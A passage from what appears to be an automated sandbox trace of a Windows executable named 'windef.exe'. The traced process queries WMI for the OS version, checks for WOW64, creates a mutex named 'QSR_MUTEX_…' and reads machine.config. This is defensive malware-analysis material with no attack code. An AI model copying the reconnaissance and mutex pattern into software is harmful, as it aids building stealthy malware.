Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19defc | out: ppvObject=0x19defc*=0x0) returned 0x80004002 [0160.770] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19df08 | out: ppvObject=0x19df08*=0x516724) returned 0x0 [0160.771] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x516724, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19df10 | out: pCid=0x19df10*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0160.771] WbemLocator:IUnknown:Release (This=0x516724) returned 0x3 [0160.771] CoGetContextToken (in: pToken=0x19df68 | out: pToken=0x19df68) returned 0x0 [0160.772] CoGetContextToken (in: pToken=0x19e370 | out: pToken=0x19e370) returned 0x0 [0160.772] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e400 | out: ppvObject=0x19e400*=0x5167ac) returned 0x0 [0160.772] WbemLocator:IRpcOptions:Query (in: This=0x5167ac, pPrx=0x5167c8, dwProperty=2, pdwValue=0x19e428 | out: pdwValue=0x19e428) returned 0x80004002 [0160.772] WbemLocator:IUnknown:Release (This=0x5167ac) returned 0x3 [0160.772] WbemLocator:IUnknown:Release (This=0x5167c8) returned 0x2 [0160.772] CoGetContextToken (in: pToken=0x19e948 | out: pToken=0x19e948) returned 0x0 [0160.773] CoGetContextToken (in: pToken=0x19e8a8 | out: pToken=0x19e8a8) returned 0x0 [0160.773] WbemLocator:IUnknown:QueryInterface (in: This=0x5167c8, riid=0x19e978*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19e974 | out: ppvObject=0x19e974*=0x505518) returned 0x0 [0160.773] IUnknown:AddRef (This=0x505518) returned 0x4 [0160.773] IUnknown:Release (This=0x505518) returned 0x3 [0160.773] IUnknown:Release (This=0x505518) returned 0x2 [0160.773] WbemLocator:IUnknown:Release (This=0x4e2878) returned 0x2 [0160.773] SysStringLen (param_1=0x0) returned 0x0 [0160.774] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x4f6390, puCount=0x19ec48 | out: puCount=0x19ec48*=0x2) returned 0x0 [0160.774] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec44*=0x0, pszText=0x0 | out: puBuffLength=0x19ec44*=0xf, pszText=0x0) returned 0x0 [0160.774] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec44*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0160.774] CoGetContextToken (in: pToken=0x19ea98 | out: pToken=0x19ea98) returned 0x0 [0160.774] IUnknown:AddRef (This=0x505518) returned 0x3 [0160.774] IEnumWbemClassObject:Clone (in: This=0x505518, ppEnum=0x19ec54 | out: ppEnum=0x19ec54*=0x50c8e0) returned 0x0 [0160.782] IUnknown:QueryInterface (in: This=0x50c8e0, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb18 | out: ppvObject=0x19eb18*=0x50c8e4) returned 0x0 [0160.782] IClientSecurity:QueryBlanket (in: This=0x50c8e4, pProxy=0x50c8e0, pAuthnSvc=0x19eb68, pAuthzSvc=0x19eb64, pServerPrincName=0x19eb5c, pAuthnLevel=0x19eb60, pImpLevel=0x19eb50, pAuthInfo=0x19eb54, pCapabilites=0x19eb58 | out: pAuthnSvc=0x19eb68*=0xa, pAuthzSvc=0x19eb64*=0x0, pServerPrincName=0x19eb5c, pAuthnLevel=0x19eb60*=0x6, pImpLevel=0x19eb50*=0x2, pAuthInfo=0x19eb54, pCapabilites=0x19eb58*=0x1) returned 0x0 [0160.782] IUnknown:Release (This=0x50c8e4) returned 0x1 [0160.782] IUnknown:QueryInterface (in: This=0x50c8e0, riid=0x6c2410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb0c | out: ppvObject=0x19eb0c*=0x5161c8) returned 0x0 [0160.783] IUnknown:QueryInterface (in: This=0x50c8e0, riid=0x6c241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19eb08 | out: ppvObject=0x19eb08*=0x50c8e4) returned 0x0 [0160.783] IClientSecurity:SetBlanket (This=0x50c8e4, pProxy=0x50c8e0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0160.902] IUnknown:Release (This=0x50c8e4) returned 0x2 [0160.902] WbemLocator:IUnknown:Release (This=0x5161c8) returned 0x1 [0160.902] CoTaskMemFree (pv=0x510740) [0160.903] IUnknown:QueryInterface (in: This=0x50c8e0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e6f4 | out: ppvObject=0x19e6f4*=0x5161c8) returned 0x0 [0160.904] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e6b0 | out: ppvObject=0x19e6b0*=0x0) returned 0x80004002 [0160.905] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e4cc | out: ppvObject=0x19e4cc*=0x0) returned 0x80004002 [0160.945] IUnknown:QueryInterface (in: This=0x50c8e0, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e2a4 | out: ppvObject=0x19e2a4*=0x0) returned 0x80004002 [0160.991] WbemLocator:IUnknown:AddRef (This=0x5161c8) returned 0x3 [0160.991] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e00c | out: ppvObject=0x19e00c*=0x0) returned 0x80004002 [0160.991] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19dfbc | out: ppvObject=0x19dfbc*=0x0) returned 0x80004002 [0160.991] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19dfc8 | out: ppvObject=0x19dfc8*=0x516124) returned 0x0 [0160.991] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x516124, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19dfd0 | out: pCid=0x19dfd0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0160.991] WbemLocator:IUnknown:Release (This=0x516124) returned 0x3 [0160.991] CoGetContextToken (in: pToken=0x19e028 | out: pToken=0x19e028) returned 0x0 [0160.992] CoGetContextToken (in: pToken=0x19e430 | out: pToken=0x19e430) returned 0x0 [0160.992] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e4c0 | out: ppvObject=0x19e4c0*=0x5161ac) returned 0x0 [0160.992] WbemLocator:IRpcOptions:Query (in: This=0x5161ac, pPrx=0x5161c8, dwProperty=2, pdwValue=0x19e4e8 | out: pdwValue=0x19e4e8) returned 0x80004002 [0160.992] WbemLocator:IUnknown:Release (This=0x5161ac) returned 0x3 [0160.992] WbemLocator:IUnknown:Release (This=0x5161c8) returned 0x2 [0160.992] CoGetContextToken (in: pToken=0x19ea08 | out: pToken=0x19ea08) returned 0x0 [0160.992] CoGetContextToken (in: pToken=0x19e968 | out: pToken=0x19e968) returned 0x0 [0160.992] WbemLocator:IUnknown:QueryInterface (in: This=0x5161c8, riid=0x19ea38*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x19ea34 | out: ppvObject=0x19ea34*=0x50c8e0) returned 0x0 [0160.992] IUnknown:AddRef (This=0x50c8e0) returned 0x4 [0160.992] IUnknown:Release (This=0x50c8e0) returned 0x3 [0160.992] IUnknown:Release (This=0x50c8e0) returned 0x2 [0160.992] IUnknown:Release (This=0x505518) returned 0x2 [0160.993] SysStringLen (param_1=0x0) returned 0x0 [0160.994] IEnumWbemClassObject:Reset (This=0x50c8e0) returned 0x0 [0161.005] CoTaskMemAlloc (cb=0x4) returned 0x4f5340 [0161.005] IEnumWbemClassObject:Next (in: This=0x50c8e0, lTimeout=-1, uCount=0x1, apObjects=0x4f5340, puReturned=0x230ad74 | out: apObjects=0x4f5340*=0x5446b0, puReturned=0x230ad74*=0x1) returned 0x0 [0161.016] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e2b8 | out: ppvObject=0x19e2b8*=0x5446b0) returned 0x0 [0161.017] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6ccbfdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e274 | out: ppvObject=0x19e274*=0x0) returned 0x80004002 [0161.017] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6ccbfb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e094 | out: ppvObject=0x19e094*=0x0) returned 0x80004002 [0161.017] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6ccc056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19de6c | out: ppvObject=0x19de6c*=0x0) returned 0x80004002 [0161.018] IUnknown:AddRef (This=0x5446b0) returned 0x3 [0161.018] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6ccc0208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19dbd4 | out: ppvObject=0x19dbd4*=0x0) returned 0x80004002 [0161.018] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6ccc015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19db84 | out: ppvObject=0x19db84*=0x0) returned 0x80004002 [0161.018] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6cb940e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19db90 | out: ppvObject=0x19db90*=0x5446b4) returned 0x0 [0161.018] IMarshal:GetUnmarshalClass (in: This=0x5446b4, riid=0x6cb86c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19db98 | out: pCid=0x19db98*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0161.018] IUnknown:Release (This=0x5446b4) returned 0x3 [0161.018] CoGetContextToken (in: pToken=0x19dbf0 | out: pToken=0x19dbf0) returned 0x0 [0161.018] CoGetContextToken (in: pToken=0x19dff8 | out: pToken=0x19dff8) returned 0x0 [0161.019] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x6ccc0448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e088 | out: ppvObject=0x19e088*=0x0) returned 0x80004002 [0161.019] IUnknown:Release (This=0x5446b0) returned 0x2 [0161.019] CoGetContextToken (in: pToken=0x19e5c8 | out: pToken=0x19e5c8) returned 0x0 [0161.019] CoGetContextToken (in: pToken=0x19e528 | out: pToken=0x19e528) returned 0x0 [0161.019] IUnknown:QueryInterface (in: This=0x5446b0, riid=0x19e5f8*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19e5f4 | out: ppvObject=0x19e5f4*=0x5446b0) returned 0x0 [0161.020] IUnknown:AddRef (This=0x5446b0) returned 0x4 [0161.020] IUnknown:Release (This=0x5446b0) returned 0x3 [0161.021] IUnknown:Release (This=0x5446b0) returned 0x2 [0161.021] CoTaskMemFree (pv=0x4f5340) [0161.021] CoGetContextToken (in: pToken=0x19e930 | out: pToken=0x19e930) returned 0x0 [0161.021] IUnknown:AddRef (This=0x5446b0) returned 0x3 [0161.024] IWbemClassObject:Get (in: This=0x5446b0, wszName="__GENUS", lFlags=0, pVal=0x19ec44*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecc4*=0, plFlavor=0x19ecc0*=0 | out: pVal=0x19ec44*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19ecc4*=3, plFlavor=0x19ecc0*=64) returned 0x0 [0161.025] IWbemClassObject:Get (in: This=0x5446b0, wszName="__PATH", lFlags=0, pVal=0x19ec28*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=0, plFlavor=0x19eca8*=0 | out: pVal=0x19ec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=8, plFlavor=0x19eca8*=64) returned 0x0 [0161.052] IWbemClassObject:Get (in: This=0x5446b0, wszName="__RELPATH", lFlags=0, pVal=0x19ec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=8, plFlavor=0x19eca8*=64 | out: pVal=0x19ec28*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19ecac*=8, plFlavor=0x19eca8*=64) returned 0x0 [0161.054] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x4f6390, puCount=0x19ec80 | out: puCount=0x19ec80*=0x2) returned 0x0 [0161.054] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec7c*=0x0, pszText=0x0 | out: puBuffLength=0x19ec7c*=0xf, pszText=0x0) returned 0x0 [0161.054] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec7c*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec7c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.056] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x4f6390, puCount=0x19ec4c | out: puCount=0x19ec4c*=0x2) returned 0x0 [0161.056] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec48*=0x0, pszText=0x0 | out: puBuffLength=0x19ec48*=0xf, pszText=0x0) returned 0x0 [0161.056] WbemDefPath:IWbemPath:GetText (in: This=0x4f6390, lFlags=4, puBuffLength=0x19ec48*=0xf, pszText="00000000000000" | out: puBuffLength=0x19ec48*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0161.056] IWbemClassObject:Get (in: This=0x5446b0, wszName="Caption", lFlags=0, pVal=0x19ec48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x230b388*=0, plFlavor=0x230b38c*=0 | out: pVal=0x19ec48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro", varVal2=0x0), pType=0x230b388*=8, plFlavor=0x230b38c*=0) returned 0x0 [0161.058] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0161.058] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0161.058] IWbemClassObject:Get (in: This=0x5446b0, wszName="Caption", lFlags=0, pVal=0x19ec50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x230b388*=8, plFlavor=0x230b38c*=0 | out: pVal=0x19ec50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Microsoft Windows 10 Pro", varVal2=0x0), pType=0x230b388*=8, plFlavor=0x230b38c*=0) returned 0x0 [0161.058] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0161.058] SysStringByteLen (bstr="Microsoft Windows 10 Pro") returned 0x30 [0161.064] CoGetContextToken (in: pToken=0x19eb80 | out: pToken=0x19eb80) returned 0x0 [0161.064] WbemLocator:IUnknown:Release (This=0x5161c8) returned 0x1 [0161.064] IUnknown:Release (This=0x50c8e0) returned 0x0 [0161.365] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x74650000 [0161.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="IsWow64Process", cchWideChar=14, lpMultiByteStr=0x19ec74, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IsWow64ProcessÈjt\x8fu\x80 «·l\x08ï\x19", lpUsedDefaultChar=0x0) returned 14 [0161.367] GetProcAddress (hModule=0x74650000, lpProcName="IsWow64Process") returned 0x74669f10 [0161.367] GetCurrentProcess () returned 0xffffffff [0161.368] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ecd4 | out: Wow64Process=0x19ecd4*=1) returned 1 [0161.604] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="QSR_MUTEX_0kBRNrRz5TDLEQouI0") returned 0x3c8 [0161.642] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe", nBufferLength=0x105, lpBuffer=0x19e7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe", lpFilePart=0x0) returned 0x33 [0162.769] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\", lpszLongPath=0x19ed18, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\") returned 0x16 [0162.770] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config", nBufferLength=0x105, lpBuffer=0x19ed2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config", lpFilePart=0x0) returned 0x3a [0162.770] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config", nBufferLength=0x105, lpBuffer=0x19ecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\windef.exe.config", lpFilePart=0x0) returned 0x3a [0163.320] GetCurrentProcess () returned 0xffffffff [0163.321] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x19f08c | out: TokenHandle=0x19f08c*=0x3cc) returned 1 [0163.336] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x19eb68, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0163.337] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0163.339] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19eb34, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0163.339] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x19f08c | out: lpFileInformation=0x19f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56a29ff, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x97df7583, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x97df7583, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0163.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x19eac4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0163.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19efb8) returned 1 [0163.341] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d0 [0163.341] GetFileType (hFile=0x3d0) returned 0x1 [0163.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19efb4) returned 1 [0163.341] GetFileType (hFile=0x3d0) returned 0x1 [0163.364] GetFileSize (in: hFile=0x3d0, lpFileSizeHigh=0x19f080 | out: lpFileSizeHigh=0x19f080*=0x0) returned 0x8c8f [0163.365] ReadFile (in: hFile=0x3d0, lpBuffer=0x23170a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19f03c, lpOverlapped=0x0 | out: lpBuffer=0x23170a4*, lpNumberOfBytesRead=0x19f03c*=0x1000, lpOverlapped=0x0) returned 1 [0163.396] ReadFile (in: hFile=0x3d0, lpBuffer=0x23170a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19eed8, lpOverlapped=0x0 | out: lpBuffer=0x23170a4*, lpNumberOfBytesRead=0x19eed8*=0x1000, lpOverlapped=0x0) returned 1 [0163.401] ReadFile (in: hFile=0x3d0, lpBuffer=0x23170a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed8c, lpOverlapped=0x0 | out: lpBuffer=0x23170a4*, lpNumberOfBytesRead=0x19ed8c*=0x1000, lpOverlapped=0x0) returned 1 [0163.403] ReadFile (in: hFile=0x3d0, lpBuffer=0x23170a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed8c, lpOverlapped=0x0 | out: lpBuffer=0x23170a4*, lpNumberOfBytesRead=0x19ed8c*=0x1000, lpOverlapped=0x0) returned 1 [0163.403] ReadFile (in: hFile=0x3d0, lpBuffer=0x23170a4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed8c, lpOverlapped=0x0 | out: lpBuffer=0x23170a4*, lpNumberOfBytesRead=0x19ed8c*=0x1000, lpOverlapped=0x0) returned 1 [0163.407] ReadFile (in: hFile=0x3d0, lpBuffer=0x2132c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ecc4, lpOverlapped=0x0 | out: lpBuffer=0x2132c58*, lpNumberOfBytesRead=0x19ecc4*=0x1000, lpOverlapped=0x0) returned 1 [0163.418] ReadFile (in: hFile=0x3d0, lpBuffer=0x2132c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ee40, lpOverlapped=0x0 | out: lpBuffer=0x2132c58*, lpNumberOfBytesRead=0x19ee40*=0x1000, lpOverlapped=0x0) returned 1 [0163.424] ReadFile (in: hFile=0x3d0, lpBuffer=0x2132c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed54, lpOverlapped=0x0 | out: lpBuffer=0x2132c58*, lpNumberOfBytesRead=0x19ed54*=0x1000, lpOverlapped=0x0) returned 1 [0163.424] ReadFile (in: hFile=0x3d0, lpBuffer=0x2132c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ed54, lpOverlapped=0x0 | out: lpBuffer=0x2132c58*, lpNumberOfBytesRead=0x19ed54*=0xc8f, lpOverlapped=0x0) returned 1 [0163.425] ReadFile (in: hFile=0x3d0, lpBuffer=0x2132c58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x19ee14, lpOverlapped=0x0 | out: lpBuffer=0x2132c58*, lpNumberOfBytesRead=0x19ee14*=0x0, lpOverlapped=0x0) returned 1 [0163.425] CloseHandle (hObject=0x3d0) 